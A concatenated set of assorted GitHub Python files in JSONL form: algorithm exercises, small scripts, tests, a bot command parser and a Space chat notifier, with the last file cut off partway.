\"\"\"==========================调用算法模板进行种群进化========================\"\"\"\n [BestIndi, population] = myAlgorithm.run(prophetPop) # 执行算法模板,得到最优个体以及最后一代种群\n # [BestIndi, population] = myAlgorithm.run() # 执行算法模板,得到最优个体以及最后一代种群\n BestIndi.save() # 把最优个体的信息保存到文件中\n \"\"\"=================================输出结果==============================\"\"\"\n print('评价次数:%s' % myAlgorithm.evalsNum)\n print('时间已过 %s 秒' % myAlgorithm.passTime)\n if BestIndi.sizes != 0:\n print('最优的目标函数值为:%s' % BestIndi.ObjV[0][0])\n print('最优的控制变量值为:')\n for i in range(BestIndi.Phen.shape[1]):\n print(BestIndi.Phen[0, i],end=\" \")\n print(\"\")\n # print('最优的i,j,b,r值为:')\n # print(' | b | r | i | j | ')\n # print('---------------------------')\n # Xijbr=BestIndi.Phen.reshape(3,3,3,3)\n # for b in range(B):\n # for r in range(R):\n # for i in range(S):\n # for j in range(T):\n # if(Xijbr[i][j][b][r]==1):\n # print(\" | \",b+1,\" | \",r+1,\" | \",i+1,\" | \",j+1,\" | \")\n else:\n print('没找到可行解。')","repo_name":"aspxcor/Optimization-Plan-for-Emergency-Evacuation-of-Personnel-Based-on-Optimization-Algorithm","sub_path":"Code/Problem1/genetic.py","file_name":"genetic.py","file_ext":"py","file_size_in_byte":12492,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"}
+{"seq_id":"70129675210","text":"def solution(n, costs):\n \n def find_set(x):\n if x != parent[x]:\n parent[x] = find_set(parent[x])\n return parent[x]\n \n costs.sort(key=lambda x: x[2])\n parent = list(range(n))\n count, cost = 0, 0\n for s, e, w in costs:\n s_root, e_root = find_set(s), find_set(e)\n if s_root != e_root:\n parent[e_root] = s_root\n cost += w\n count += 1\n if count >= n-1:\n break\n return cost","repo_name":"kylekim2123/Algorithm-with-Python","sub_path":"Programmers/Level3/섬연결하기.py","file_name":"섬연결하기.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"13312522172","text":"\n# 3. multiple user input in dictionary using while loop\n\nuser_vacations = {}\n\nactive_polling = True\nprompt1 = \"what is your name? \"\nprompt2 = \"If you could visit one place in the world, where would you go? \"\nprompt3 = \"Would you like to continue for other? (yes | no) \"\nwhile active_polling:\n\tuser_name = input(prompt1.title())\n\tdream_vacation = input(prompt2.title())\n\t\n\tuser_vacations[user_name] = dream_vacation\n\t\n\trepeat = input(prompt3.title())\n\tif repeat == 'no':\n\t\tactive_polling = False\n\nprint(\"\\n----- RESULTS OF THE POLL ------\\n\")\nfor name, vacation in user_vacations.items():\n\tprint(name.title() + \" has a dream of visiting \" + vacation.title() + \".\")\n","repo_name":"huzaifabaloch/Python_Crash_Book_Exercises","sub_path":"Chap_7 - User Input And While Loop/7_10_dream_vacation.py","file_name":"7_10_dream_vacation.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"38502336034","text":"\"\"\"\n Main script for application.\n\"\"\"\n\n__author__ = ['Bhavik Patel']\n__version__ = \"1.0.0\"\n\nfrom my_app import app\n\n\ndef main():\n # init main object\n print(\"Initializing script..\")\n obj = app.App()\n\n print(\"Running app..\")\n obj.run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"bhvikp/pyspark-skeleton","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"22928962916","text":"from some_model import SomeModel\n\n\ndef predict_message_mood(\n message: str,\n model: SomeModel,\n bad_thresholds: float = 0.3,\n good_thresholds: float = 0.8,\n) -> str:\n score: float = model.predict(message)\n\n if good_thresholds > 1.0 or good_thresholds < 0.0:\n raise ValueError('good_thresholds must be in range [0.0 , 1.0]')\n\n if bad_thresholds > 1.0 or bad_thresholds < 0.0:\n raise ValueError('bad_thresholds must be in range [0.0 , 1.0]')\n\n if good_thresholds < bad_thresholds:\n raise ValueError('good_thresholds must be greater than bad_thresholds')\n\n if score < bad_thresholds:\n return 'неуд'\n elif score > good_thresholds:\n return 'отл'\n else:\n return 'норм'\n","repo_name":"genusB/made_advance_python","sub_path":"advance_07/predict_message_mood.py","file_name":"predict_message_mood.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"2474574143","text":"\"\"\"\nFiona Wong\n\nMaddelin Maddelin\n\"\"\"\nfrom game_creation import ascii_art\n\n\ndef character_has_leveled(character: dict, level_chart: dict) -> bool:\n \"\"\"\n Return True if character has leveled up based on a dictionary of set level EXP, else False.\n\n :param character: a dictionary that contains the following keys (each with possibly modified values):\n 'Name', 'Partner Name', 'X-coordinate', 'Y-coordinate', 'LEVEL', 'HP', and 'EXP'\n :param level_chart: a dictionary that contains the attainable levels and the EXP value required for each level\n :precondition: character must be a non-empty dictionary containing the necessary key-value pairs\n :return: True if character has leveled up based on a dictionary of set level EXP, else False\n\n >>> test_character = {'Name': 'Hunter', 'Partner Name': 'Killua', 'X-coordinate': 0, 'Y-coordinate': 0, 'LEVEL': 1,\n ... 'HP': 100, 'EXP': 0}\n >>> test_level_chart = {1: 1, 2: 5, 3: 25, 4: 125, 5: 625}\n >>> character_has_leveled(test_character, test_level_chart)\n False\n >>> test_character = {'Name': 'Raon', 'Partner Name': 'Gon', 'X-coordinate': 0, 'Y-coordinate': 0, 'LEVEL': 1,\n ... 'HP': 100, 'EXP': 125}\n >>> test_level_chart = {1: 1, 2: 5, 3: 25, 4: 125, 5: 625}\n >>> character_has_leveled(test_character, test_level_chart)\n True\n \"\"\"\n result = False\n next_exp = level_chart[character['LEVEL'] + 1]\n if character['LEVEL'] and character['EXP'] >= next_exp:\n result = True\n return result\n\n\ndef display_level_chart() -> dict:\n \"\"\"\n Create and print a dictionary that contains the attainable levels and the EXP value required for each level.\n\n :postcondition: creates and prints a dictionary that contains the attainable levels and the EXP value required for\n each level.\n :return: a dictionary that contains the attainable levels and the EXP value required for each level\n\n >>> level_chart = display_level_chart()\n >>> level_chart\n {1: 100, 2: 200, 3: 300, 4: 400, 5: 500, 6: 600, 7: 700, 8: 800, 9: 900, 10: 1000}\n \"\"\"\n return {level: exp for level, exp in enumerate(range(100, 1100, 100), start=1)}\n\n\ndef execute_glow_up_protocol(character: dict) -> None:\n \"\"\"\n Display the corresponding ASCII art and increment the character level by 1 and HP by 100.\n\n :param character: a dictionary that contains the following keys (each with possibly modified values):\n 'Name', 'Partner Name', 'X-coordinate', 'Y-coordinate', 'LEVEL', 'HP', and 'EXP'\n :precondition: character must be a non-empty dictionary containing the necessary key-value pairs\n :postcondition: displays the corresponding ASCII art and increments the character level by 1 and HP by 100\n\n >>> test_character = {'Name': 'Jess', 'Partner Name': 'Bess', 'X-coordinate': 0, 'Y-coordinate': 0, 'LEVEL': 1,\n ... 'HP': 100, 'EXP': 25}\n >>> execute_glow_up_protocol(test_character)\n ========================================================================\n +.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.\n ||| ||||| || || |||||| ||| || || |||||||\n ||| || || || || ||| || || || ||\n ||| ||||| || || ||||| ||| || || |||||||\n ||| || | | || ||| || || ||\n |||||| ||||| ||| |||||| ||||||| |||||| ||\n +.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.\n ========================================================================\n \n Current Status:\n LEVEL: 2\n HP: 300\n EXP: 25\n \n\n >>> test_character = {'Name': 'Hiu', 'Partner Name': 'Paus', 'X-coordinate': 0, 'Y-coordinate': 0, 'LEVEL': 3,\n ... 'HP': 1, 'EXP': 125}\n >>> execute_glow_up_protocol(test_character)\n ========================================================================\n +.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.\n ||| ||||| || || |||||| ||| || || |||||||\n ||| || || || || ||| || || || ||\n ||| ||||| || || ||||| ||| || || |||||||\n ||| || | | || ||| || || ||\n |||||| ||||| ||| |||||| ||||||| |||||| ||\n +.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.\n ========================================================================\n \n Current Status:\n LEVEL: 4\n HP: 201\n EXP: 125\n \n \"\"\"\n ascii_art.level_up_message()\n character['LEVEL'] += 1\n character['HP'] += 200\n print(f\"\\tCurrent Status:\\n\"\n f\"\\tLEVEL: {character['LEVEL']}\\n\"\n f\"\\tHP: {character['HP']}\\n\"\n f\"\\tEXP: {character['EXP']}\\n\")\n","repo_name":"Maddelin/revival-A4-1510","sub_path":"character_information/leveling.py","file_name":"leveling.py","file_ext":"py","file_size_in_byte":4926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"72762500808","text":"\"\"\"\nPlot the entropy of user usages by county.\n\n\"\"\"\n\nimport sys\nimport twitterproj\nimport json\nimport matplotlib\nimport matplotlib.pyplot as plt\n\ndef collect_data():\n count = sys.argv[1]\n style = sys.argv[2]\n normalized = bool(int(sys.argv[3]))\n\n ents = twitterproj.userentropy__counties(count, style, normalized=normalized)\n fn = \"userentropies_{0}_{1}_{2}.json\"\n if normalized:\n fn = fn.format(count, style, 'norm')\n else:\n fn = fn.format(count, style, 'nonorm')\n\n with open(fn, 'w') as f:\n json.dump(ents, f)\n\ndef plot():\n numTweets_count = json.load(open('userentropies_numTweets_count_norm.json'))\n numTweetsWithHashtags_count = json.load(open('userentropies_numTweetsWithHashtags_count_norm.json'))\n\n numTweets_count_nonorm = json.load(open('userentropies_numTweets_count_nonorm.json'))\n numTweetsWithHashtags_count_nonorm = json.load(open('userentropies_numTweetsWithHashtags_count_nonorm.json'))\n\n population = json.load(open('json/grids.counties.bot_filtered.respop72013.json'))\n\n counties = list(numTweets_count.keys())\n\n w = [numTweets_count[geoid] for geoid in counties]\n x = [numTweetsWithHashtags_count[geoid] for geoid in counties]\n y = [numTweets_count_nonorm[geoid] for geoid in counties]\n z = [numTweetsWithHashtags_count_nonorm[geoid] for geoid in counties]\n c = [population[geoid] for geoid in counties]\n\n #matplotlib.style.use('fivethirtyeight')\n import seaborn\n\n f, (ax1, ax2) = plt.subplots(1,2)\n ax1.scatter(w, x, c=c, s=5, alpha=.5, edgecolors='none',\n norm=matplotlib.colors.LogNorm(), cmap=matplotlib.cm.GnBu)\n cax = ax2.scatter(y, z, c=c, s=5, alpha=.5, edgecolors='none',\n norm=matplotlib.colors.LogNorm(), cmap=matplotlib.cm.GnBu)\n\n ax1.set_xlabel('Normalized User Entropy of Tweets')\n ax1.set_ylabel('Normalized User Entropy of Hashtagged Tweets')\n ax1.set_xlim(0.0001, 0.15)\n ax1.set_ylim(0.0001, 0.15)\n ax1.set_xscale('log')\n ax1.set_yscale('log')\n ax2.set_xlabel('User Entropy of Tweets')\n ax2.set_ylabel('User Entropy of Hashtagged Tweets')\n\n cb = f.colorbar(cax)\n cb.set_label(\"Log Population\")\n\n f.savefig('UserEntropyByCounty.pdf')\n\nplot()\n#collect_data()\n","repo_name":"chebee7i/twitter","sub_path":"scripts/userentropies.py","file_name":"userentropies.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"10893286819","text":"from random import *\r\n\r\ndef main():\r\n \r\n choice = input(\"Just 'p'orts, 'i'p, 't'ransmisisson, 's'tandards, or study 'e'verything?\")\r\n\r\n if choice.lower() == \"p\":\r\n flashcards = open(\"ports.txt\", \"r\")\r\n elif choice.lower() == \"i\":\r\n flashcards = open(\"ip.txt\")\r\n elif choice.lower() == \"t\":\r\n flashcards = open(\"transmission.txt\")\r\n elif choice.lower() == \"s\":\r\n flashcards = open(\"standards.txt\")\r\n else:\r\n flashcards = open(\"flashcards.txt\", \"r\")\r\n\r\n flashDict = {}\r\n flashKeys = []\r\n wrongKeys = []\r\n done = False\r\n count = 0\r\n\r\n for card in flashcards:\r\n question, answer = card.split(\",\")\r\n answer = answer.strip(\"\\n\")\r\n flashDict[question] = answer.lower()\r\n\r\n for key in flashDict.keys():\r\n flashKeys.append(key)\r\n\r\n for i in range(len(flashKeys) - 1):\r\n num = randrange(0, (len(flashKeys) - 1))\r\n flashKeys[i], flashKeys[num] = flashKeys[num], flashKeys[i]\r\n\r\n for question in flashKeys:\r\n questionStr = question + \": \"\r\n answer = input(questionStr)\r\n\r\n if answer.lower() in flashDict[question]:\r\n print(\"CORRECT!\\n\")\r\n count = count + 1\r\n else:\r\n print(\"Incorrect! Answer: \", flashDict[question], \"\\n\")\r\n wrongKeys.append(question)\r\n \r\n print(\"You got: \", count, \"correct out of \", len(flashDict))\r\n print(\"Work on: \")\r\n\r\n for key in wrongKeys:\r\n print(key)\r\n \r\nmain()\r\n","repo_name":"duncan-mcfarland/flashcards","sub_path":"NetworkPlus.py","file_name":"NetworkPlus.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"16015299861","text":"from logs_ingest.mapping import extract_resource_id_attributes, RESOURCE_ID_ATTRIBUTE, SUBSCRIPTION_ATTRIBUTE, \\\n RESOURCE_GROUP_ATTRIBUTE, RESOURCE_TYPE_ATTRIBUTE, RESOURCE_NAME_ATTRIBUTE\n\n\ndef test_extract_resource_id_simple_resource_id():\n run_successful_extraction_test(\n resource_id=\"subscriptions/a84d2d12-76ea-449c-8c1e-9fb2dee5f6b1/resourceGroups/rg-adagze/providers/Microsoft.Maps/accounts/maps-hackaton-test\",\n expected_subscription=\"a84d2d12-76ea-449c-8c1e-9fb2dee5f6b1\",\n expected_resource_group=\"rg-adagze\",\n expected_resource_type=\"Microsoft.Maps/accounts\",\n expected_resource_name=\"maps-hackaton-test\"\n )\n\n\ndef test_extract_resource_id_attributes_nested_resource_type():\n run_successful_extraction_test(\n resource_id=\"/subscriptions/a84d2d12-76ea-449c-8c1e-9fb2dee5f6b1/resourceGroups/rg-jelpet/providers/Microsoft.NetApp/netAppAccounts/naf-jelpet-just-trying/capacityPools/cappool-jelpet-just-trying\",\n expected_subscription=\"a84d2d12-76ea-449c-8c1e-9fb2dee5f6b1\",\n expected_resource_group=\"rg-jelpet\",\n expected_resource_type=\"Microsoft.NetApp/netAppAccounts/capacityPools\",\n expected_resource_name=\"cappool-jelpet-just-trying\"\n )\n\n\ndef test_extract_resource_id_attributes_invalid_resource_id():\n result_dict = {}\n resource_id = \"a84d2d12-76ea-449c-8c1e-9fb2dee5f6b1/resourceGroups/rg-jelpet/providers/Microsoft.NetApp/netAppAccounts/naf-jelpet-just-trying/capacityPools/cappool-jelpet-just-trying\"\n extract_resource_id_attributes(result_dict, resource_id)\n assert result_dict == {RESOURCE_ID_ATTRIBUTE: resource_id}\n\n\ndef run_successful_extraction_test(\n resource_id: str,\n expected_subscription: str,\n expected_resource_group: str,\n expected_resource_type: str,\n expected_resource_name: str\n):\n result_dict = {}\n extract_resource_id_attributes(result_dict, resource_id)\n assert result_dict[SUBSCRIPTION_ATTRIBUTE].casefold() == expected_subscription.casefold()\n assert result_dict[RESOURCE_GROUP_ATTRIBUTE].casefold() == expected_resource_group.casefold()\n assert result_dict[RESOURCE_TYPE_ATTRIBUTE].casefold() == expected_resource_type.casefold()\n assert result_dict[RESOURCE_NAME_ATTRIBUTE].casefold() == expected_resource_name.casefold()\n","repo_name":"dynatrace-oss/dynatrace-azure-log-forwarder","sub_path":"tests/test_mapping.py","file_name":"test_mapping.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"16"}
+{"seq_id":"32428544591","text":"#Replace all occurences of BLANK with appropriate terms in the code below to make it work!\nclass Course:\n def __init__(self, number, name):\n self._name = name\n self._number = number\n\n def get_name(self):\n return self._name\n\nclass Instructor:\n \"\"\"\n Class for a Instructor Object that can teach courses\n \"\"\"\n def __init__(self, name):\n print(\"Initializing Instructor object for name \", name)\n self._name = name\n #_courses_enrolled will be the data member which is a collection of objects\n self._courses_enrolled = []\n\n def teach_course(self, class_name):\n print(\"Teaching course\", class_name.get_name())\n #add course to the _courses_enrolled collection\n self._courses_enrolled.append(class_name)\n\n def print_courses(self):\n print(\"Courses this Instructor is going to teach: \")\n for course in self._courses_enrolled:\n print(course.get_name())\n\n#create objects\ninstructor_1 = Instructor(\"ABC\")\ncs161_course = Course(\"CS161\", \"Introduction to Computer Science I\")\ncs162_course = Course(\"CS162\", \"Introduction to Computer Science II\")\n\n#now call methods\ninstructor_1.teach_course(cs161_course)\ninstructor_1.teach_course(cs162_course)\ninstructor_1.print_courses()\n\n#Debug and fix this piece of code to make it work\n\nclass Course:\n def __init__(self, number, name):\n self._name = name\n self._number = number\n\n def get_name(self):\n return self._name\n\ncs161_course = Course(\"CS161\", \"Introduction to Computer Science I\")\ncs162_course = Course(\"CS162\", \"Introduction to Computer Science II\")\n\nlist_of_courses = {cs161_course, cs162_course}\n\ndictionary_of_courses = {\"CS161\":cs161_course, \"CS162\": cs162_course}\nprint(dictionary_of_courses['CS161'].get_name())\nprint(dictionary_of_courses['CS162'].get_name())","repo_name":"BrianDy255/HelloWorld","sub_path":"CS 161/Week 10/Exploration Objects Inside Collections Exercise.py","file_name":"Exploration Objects Inside Collections Exercise.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70027054410","text":"import cv2\nimport os\nfrom PIL import Image\nfrom PIL import ImageFile\nImageFile.LOAD_TRUNCATED_IMAGES = True\n# location of dataset \n#video_path = '/c3d/C3D-Action-Recognition/datasets/ucf-101/'\nvideo_path = './datasets/ucf-101/'\nlabelnum=-1\nlabellist=[]\naction_list = os.listdir(video_path)\n# split dataset into train test and classifcation parts\nf1 = open('./ucfTrainTestlist/train_file.txt', 'w')\nf2 = open('./ucfTrainTestlist/test_file.txt', 'w')\nf3 = open('./ucfTrainTestlist/classInd.txt', 'w')\n#f1 = open('/c3d/C3D-Action-Recognition/ucfTrainTestlist/train_file.txt', 'w')\n#f2 = open('/c3d/C3D-Action-Recognition/ucfTrainTestlist/test_file.txt', 'w')\n#f3 = open('/c3d/C3D-Action-Recognition/ucfTrainTestlist/classInd.txt', 'w')\nfor action in action_list:\n video_list = os.listdir(video_path+action)\n prefixlist=[]\n labelnum+=1\n for video in video_list:\n prefix = video.split('.avi')[0] # if see first '.' then split the string\n if video.find('v_',0) == 0:\n prefix = prefix.replace('v_','')\n prefixlist.append(prefix)\n #label = prefix.split('_')[0]\n #print(label) \n \"\"\"\n if label not in labellist:\n labellist.append(label)\n labelnum+=1\n #print(prefix)\n f1.write(prefix+' '+str(labelnum)+'\\n')\n \"\"\"\n prefixlen=len(prefixlist)\n \n train = 0.8\n for i in range(int(prefixlen*0.8)):\n f1.write(prefixlist[i]+' '+str(labelnum)+'\\n')\n for i in range(int(prefixlen*0.8),prefixlen):\n f2.write(prefixlist[i]+' '+str(labelnum)+'\\n')\ni=1\nfor action in action_list:\n f3.write(str(i)+' '+action+'\\n')\n i+=1\n\"\"\"\n if not os.path.exists(save_path+action+'/'+prefix):\n os.mkdir(save_path+action+'/'+prefix)\n save_name = save_path + action + '/' + prefix + '/'\n #save_name = save_path + prefix + '/'\n video_name = video_path+action+'/'+video\n #print(video_name)\n name = video_name.split('.')[1]\n #print(name)\n\"\"\"\n","repo_name":"CHI-YU-SUNG/C3D-Action-Recognition","sub_path":"video2list.py","file_name":"video2list.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"16351775631","text":"from util import *\nimport commands\nimport admin\n\n\ndef perm_check(cmd, userid):\n return connect().execute('''\n SELECT EXISTS(SELECT 1 FROM perm WHERE\n ((rule = :w AND (cmd = 'ALL' OR cmd = :cmd) AND userid = :userid)) AND\n duration > (julianday('now')-2440587.5)*86400.0\n ) OR NOT EXISTS(SELECT 1 FROM perm WHERE\n ((rule = :b AND (cmd = 'ALL' OR cmd = :cmd) AND userid = :userid) OR\n (rule = :w AND (cmd = 'ALL' OR cmd = :cmd) AND userid != :userid)) AND\n duration > (julianday('now')-2440587.5)*86400.0\n )\n ''', {'cmd': cmd, 'userid': userid, 'w': PERM_W, 'b': PERM_B}).fetchone()[0]\n\n\ndef parse(bot, txt, buf, msg, is_ext=False):\n # silently ignore rate-limited users\n if msg.from_user.id != admin.userid and bot.ratelimit.get(msg.from_user.id, 0) >= commands.rate_threshold: return\n\n idx = 0\n part = ''\n parts = []\n parse = True\n total_rate = 0\n\n while idx <= len(txt):\n if not parse:\n part += ('' if txt[idx] in '\\\\|' else '\\\\') + txt[idx]\n parse = True\n elif idx == len(txt) or (is_ext and txt[idx] == '|'):\n part = connect().execute('''\n SELECT dest || substr(:s, length(src)+1) FROM alias\n WHERE :s = src OR :s LIKE src || ' %'\n UNION ALL SELECT :s\n ''', {'s': part.strip()}).fetchone()[0]\n cmd, args = part.split(None, 1) if ' ' in part or '\\n' in part else (part, None)\n if not hasattr(commands, 'cmd_'+cmd):\n return f'The command {cmd} does not exist.'\n if not perm_check(cmd, msg.from_user.id):\n return f'You do not have permission to execute the {cmd} command.'\n total_rate += commands.rate_penalty[int(commands.info[cmd]['weight'])]\n parts.append((getattr(commands, 'cmd_'+cmd), args))\n part = ''\n elif is_ext and txt[idx] == '\\\\': parse = False\n else: part += txt[idx]\n idx += 1\n\n total_rate += bot.ratelimit.get(msg.from_user.id, 0)\n if msg.from_user.id != admin.userid and total_rate > commands.rate_threshold:\n bot.ratelimit[msg.from_user.id] = commands.rate_threshold + 60\n return ('[rate limit exceeded, please wait at least 1min before sending additional commands]', {})\n bot.ratelimit[msg.from_user.id] = total_rate\n\n res = ''\n rflags = {}\n for (func, args) in parts:\n buf, flags = forcetuple(func(bot, msg, buf if args is None else args, buf))\n if 'stderr' in flags: res += flags['stderr'] + '\\n'\n if 'parse_mode' in flags: rflags['parse_mode'] = flags['parse_mode']\n return (res + buf, rflags)\n","repo_name":"tckmn/kipfa","sub_path":"src/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"34138270933","text":"#\n# @lc app=leetcode id=739 lang=python3\n#\n# [739] Daily Temperatures\n#\n# https://leetcode.com/problems/daily-temperatures/description/\n#\n# algorithms\n# Medium (60.04%)\n# Total Accepted: 76.7K\n# Total Submissions: 127.4K\n# Testcase Example: '[73,74,75,71,69,72,76,73]'\n#\n# \n# Given a list of daily temperatures T, return a list such that, for each day\n# in the input, tells you how many days you would have to wait until a warmer\n# temperature. If there is no future day for which this is possible, put 0\n# instead.\n# \n# For example, given the list of temperatures T = [73, 74, 75, 71, 69, 72, 76,\n# 73], your output should be [1, 1, 4, 2, 1, 1, 0, 0].\n# \n# \n# Note:\n# The length of temperatures will be in the range [1, 30000].\n# Each temperature will be an integer in the range [30, 100].\n# \n#\n\n# naive approach\n# def dailyTemperatures(self, T):\n# n = len(T)\n# res = [0]*n\n# for i in range(n):\n# for j in range(i+1, n):\n# if T[j] > T[i]:\n# res[i] = j-i\n# break\n# return res\n\nfrom collections import Counter\nfrom functools import reduce\nclass Solution:\n # def dailyTemperatures(self, T: List[int]) -> List[int]:\n\n def dailyTemperatures3(self, T):\n ans = [0] * len(T)\n stack = [] #indexes from hottest to coldest\n for i in range(len(T) - 1, -1, -1):\n while stack and T[i] >= T[stack[-1]]:\n stack.pop()\n if stack:\n print('update i=', i, 'stack=', stack)\n ans[i] = stack[-1] - i\n stack.append(i)\n print('i=', i, 'stack=', stack)\n return ans\n\n def dailyTemperatures2(self, T):\n n = len(T)\n res = [0]*n\n for i in range(n):\n for j in range(i+1, n):\n if T[j] > T[i]:\n res[i] = j-i\n break\n return res\n\n def dailyTemperatures(self, T):\n c = Counter(T)\n # print(c)\n s = sorted([[k, v] for k, v in c.items()])\n # print(s)\n for i in range(1, len(s)):\n # print(i)\n # print(s[i])\n s[i][1] += s[i-1][1]\n # print(s)\n percentile = dict(s)\n # print(percentile)\n n = len(T)\n res = [0] * n\n \n def method1(i):\n for j in range(i+1, n):\n if T[j] > T[i]:\n return j - i\n return 0\n d = {}\n for i in range(n):\n if T[i] not in d:\n d[T[i]] = [i]\n else:\n d[T[i]].append(i)\n # print(d)\n order = [x[0] for x in s]\n # print(order)\n def method2(i):\n min_ = float('inf')\n for j in range(order.index(T[i])+1, len(s)):\n # print('here')\n for idx in d[order[j]]:\n if idx > i:\n if idx < min_:\n min_ = idx\n if min_ < float('inf'):\n return min_ - i\n else:\n return 0\n cut = int(n*0.9)\n for i in range(n):\n if percentile[T[i]] < cut:\n res[i] = method1(i)\n else:\n res[i] = method2(i)\n return res\ns = Solution()\nT = [73, 74, 75, 71, 69, 72, 76, 73]\nprint(s.dailyTemperatures3(T))\n# print(s.dailyTemperatures(T) == s.dailyTemperatures2(T))\n# T = [34,80,80,34,34,80,80,80,80,34]\n\n# print(s.dailyTemperatures(T))\n\n\n\n\n# print(s.dailyTemperatures(T) == s.dailyTemperatures2(T))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"nickyfoto/lc","sub_path":"python/739.daily-temperatures.py","file_name":"739.daily-temperatures.py","file_ext":"py","file_size_in_byte":3551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"32915493674","text":"from threading import Timer\r\nimport requests, json, logging, falcon\r\n\r\nLOGGER = logging.getLogger()\r\nLOGGER.setLevel(\"INFO\")\r\n\r\nclass SpaceNotifier:\r\n def __init__(self, webhook, debounce_time = 10, env=\"stagging\", silent = 10):\r\n self.notifications = {}\r\n self.__debounce_time = debounce_time\r\n self.__webhook = webhook\r\n self.__env = env\r\n self.__silent = {}\r\n self.__silent_threshold = silent\r\n self.__silent_general = []\r\n \r\n def __getMessage(self, etl):\r\n notif_type = {}\r\n for type in self.notifications[etl]['message']: #check how many time each type error happened\r\n if type not in notif_type:\r\n notif_type[type] = 1\r\n else:\r\n notif_type[type] += 1\r\n message = f\"Error occured on {etl} *{self.__env}*, error: \"\r\n\r\n for type in notif_type:\r\n message = f\"{message}\\n\\t- {type} : {notif_type[type] if notif_type[type] < self.__silent_threshold else f'{self.__silent_threshold-1}++'} time(s) raised.\"\r\n\r\n if(notif_type[type] >= self.__silent_threshold): # if one of error equal or more than silent threshold, then add it to silenced alert\r\n if etl not in self.__silent:\r\n self.__silent[etl] = []\r\n \r\n self.__silent[etl].append(type)\r\n message = f\"{message} \\n\\t\\t- *Occured too often, will be silenced till restart!*\"\r\n \r\n return f\"{message}\\nFor more detail, please check ELK.\"\r\n\r\n def send(self, etl, message):\r\n job = {\r\n \"message\" : [message],\r\n \"thread\" : None,\r\n }\r\n \r\n\r\n if \"with-param\" in etl:\r\n uris = etl.split(\"?\")\r\n uri = uris[0]\r\n query_param = uris[1] # keep param -> send email maybe ?\r\n\r\n etl = uri\r\n\r\n if etl in self.__silent:\r\n if message in self.__silent[etl]:\r\n # if error is silenced, then do not do anything\r\n return\r\n\r\n if etl in self.notifications and 'thread' in self.notifications[etl]:\r\n # if etl already scheduled for alerting, then cancel and debounce\r\n self.notifications[etl]['thread'].cancel()\r\n \r\n job['message'] = self.notifications[etl]['message'] + job[\"message\"] # append eror message \r\n self.notifications[etl] = {} \r\n \r\n self.notifications[etl] = job\r\n\r\n def __debounce(etl, message):\r\n try:\r\n self.notifications[etl] = {}\r\n response = requests.post(self.__webhook, data=json.dumps({\"text\":message}))\r\n if response.status_code != 200:\r\n LOGGER.error(str(e))\r\n except Exception as e:\r\n LOGGER.error(str(e))\r\n\r\n self.notifications[etl]['thread'] = Timer(self.__debounce_time, __debounce,args=[etl, self.__getMessage(etl)] )\r\n self.notifications[etl]['thread'].start()\r\n\r\n\r\n\r\n def __getTypedMessage(self, type):\r\n etl_counts = {}\r\n for etl in self.notifications[type]['etls']: #check how many time each type error happened\r\n if etl not in etl_counts:\r\n etl_counts[etl] = 1\r\n else:\r\n etl_counts[etl] += 1\r\n\r\n message = f\"Error occured while doing *{type.upper()}* on *{self.__env}* : \"\r\n\r\n for etl in etl_counts:\r\n message = f\"{message}\\n\\t- {etl} : {etl_counts[etl] if etl_counts[etl] < self.__silent_threshold else f'{self.__silent_threshold-1}++'} time(s) raised.\"\r\n\r\n if(etl_counts[etl] >= self.__silent_threshold): # if one of error equal or more than silent threshold, then add it to silenced alert\r\n if etl not in self.__silent_general:\r\n self.__silent_general.append(etl)\r\n \r\n self.__silent_general.append(etl)\r\n message = f\"{message} \\n\\t\\t- *Occured too often, will be silenced till restart!*\"\r\n \r\n return f\"{message}\\nFor more detail, please check ELK.\"\r\n \r\n def sendTyped(self, etl, type=\"ETL\" , debounce = None):\r\n \"\"\"\r\n This function will debounce an error space alert. \r\n The error is categorized as two categories, ETL and Non-ETL (recoveries:red)\r\n If no input until debounce is expired then it'll send message to Space\r\n \"\"\"\r\n\r\n # remove unnecessary query parameter, take only endpoint\r\n uris = etl.split(\"?\") \r\n etl = uris[0]\r\n\r\n jobs = {\r\n \"etls\" : [etl],\r\n \"thread\" : None,\r\n }\r\n\r\n\r\n if etl in self.__silent_general:\r\n return # if silenced then do nothing\r\n \r\n if type in self.notifications and 